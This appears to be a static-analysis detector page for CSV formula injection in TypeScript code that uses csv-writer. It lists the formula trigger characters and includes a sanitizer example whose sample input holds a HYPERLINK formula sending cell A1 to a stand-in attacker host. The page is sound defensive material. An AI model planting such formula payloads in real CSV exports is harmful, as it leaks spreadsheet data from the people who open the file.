
Typescript Unsafe Csv Injection Csv Writer

Description

This detector identifies CSV injection (also called formula injection) in TypeScript code that writes CSV files through a CSV writer library such as csv-writer. CSV injection occurs when untrusted user input is written to a CSV file without sanitization. A cell that begins with a formula trigger character (=, +, -, @) is evaluated rather than displayed when the file is opened in a spreadsheet application such as Excel or LibreOffice Calc, so an attacker can exfiltrate other cells through functions like HYPERLINK or, via DDE on Windows, prompt the victim into running a command. The CSV writer itself only quotes and delimits fields; it does not neutralize formulas, and quoting a field does not prevent the spreadsheet from evaluating it.

Weakness:

090 - CSV injection

Category: Unexpected Injection

Detection Strategy

    Scans TypeScript code for imports of CSV writer libraries and calls to their write methods (for csv-writer, writeRecords on the writer returned by createObjectCsvWriter or createArrayCsvWriter)

    Traces whether the records passed to those calls derive from user-controlled sources (for example an Express request body, query string or route parameter) without passing through validation or sanitization

    Treats a cell as dangerous when it can start with =, +, - or @ (OWASP also lists a leading tab or carriage return), because spreadsheet applications interpret such cells as formulas

    Reports a finding when a CSV writer method receives that unsanitized input, since the resulting file could carry a spreadsheet formula or DDE command

❌ Vulnerable code example

import { Request } from 'express';
import { createObjectCsvWriter } from 'csv-writer';

const csvWriter = createObjectCsvWriter({
  path: 'output.csv',
  header: [{ id: 'data', title: 'DATA' }]
});
...

✅ Secure code example

import { Request } from 'express';
import { createObjectCsvWriter } from 'csv-writer';

const csvWriter = createObjectCsvWriter({
  path: 'output.csv',
  header: [{ id: 'data', title: 'DATA' }]
});
...
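The following is an added, self-contained example, not code from this page or from the csv-writer library. It shows both sides of the detector's concern: a per-cell check for the formula trigger characters listed above (the test a scanner or a runtime guard applies), and the sanitization step that should run on records before they reach writeRecords(). Because csv-writer writes to disk and is not needed to show the point, a small RFC 4180-style serializer named toCsv stands in for csvWriter.writeRecords(); the sample records, the attacker.example host and all function names are constructed for the example.

```typescript
// Added example (not csv-writer's code): detect and neutralise spreadsheet
// formula triggers before rows are handed to a CSV writer.

// Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
// Tab and carriage return are included because OWASP lists them as triggers too.
const FORMULA_TRIGGERS: ReadonlySet<string> = new Set(['=', '+', '-', '@', '\t', '\r']);

// Detection side: the per-cell check the detector reasons about.
function isFormulaLike(cell: string): boolean {
  return cell.length > 0 && FORMULA_TRIGGERS.has(cell.charAt(0));
}

// Remediation side: prefix a dangerous cell with a single quote so the
// spreadsheet stores it as text instead of evaluating it.
function sanitizeCell(value: unknown): string {
  const s = value === null || value === undefined ? '' : String(value);
  return isFormulaLike(s) ? "'" + s : s;
}

type CsvRecord = Record<string, unknown>;

// Apply sanitizeCell to every field. The result is what you would pass to
// csvWriter.writeRecords(). Columns that legitimately hold negative numbers
// should be validated as numbers instead of going through this function.
function sanitizeRecord(record: CsvRecord): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [key, value] of Object.entries(record)) {
    out[key] = sanitizeCell(value);
  }
  return out;
}

interface Header { id: string; title: string }

// RFC 4180 quoting: wrap fields containing a quote, comma or line break and
// double any embedded quotes. This is what a CSV writer does for you, and it
// does NOT stop a spreadsheet from evaluating a formula inside the quotes.
function quoteField(field: string): string {
  return /[",\r\n]/.test(field) ? `"${field.replace(/"/g, '""')}"` : field;
}

// Stand-in for csv-writer's writeRecords(): header row, then one row per record.
function toCsv(header: Header[], records: CsvRecord[]): string {
  const rows = [header.map(h => quoteField(h.title)).join(',')];
  for (const rec of records) {
    rows.push(header.map(h => quoteField(String(rec[h.id] ?? ''))).join(','));
  }
  return rows.join('\n') + '\n';
}

// Constructed sample input: records built from an attacker-controlled request body.
const HEADER: Header[] = [{ id: 'data', title: 'DATA' }];
const SAMPLE_RECORDS: CsvRecord[] = [
  { data: '=HYPERLINK("http://attacker.example/?"&A1,"click")' }, // exfiltrates cell A1
  { data: '@SUM(1+1)' },
  { data: 'plain text' },
];

// Vulnerable path: records written verbatim, formulas intact.
function vulnerableCsv(): string {
  return toCsv(HEADER, SAMPLE_RECORDS);
}

// Hardened path: every cell sanitised before it reaches the writer.
function hardenedCsv(): string {
  return toCsv(HEADER, SAMPLE_RECORDS.map(sanitizeRecord));
}

console.log('--- vulnerable ---\n' + vulnerableCsv());
console.log('--- hardened ---\n' + hardenedCsv());
```

In the hardened output every formula cell is stored as text (`'=HYPERLINK(...)`), while the vulnerable output carries the formulas verbatim inside their RFC 4180 quotes, which spreadsheets strip before evaluating. Two caveats when applying this in a real csv-writer call: the quote prefix turns values like `-5` into text, so enforce number types for numeric columns rather than prefixing them, and apply the sanitizer to the records before `writeRecords()` rather than relying on the library's `alwaysQuote` option, which only affects delimiting.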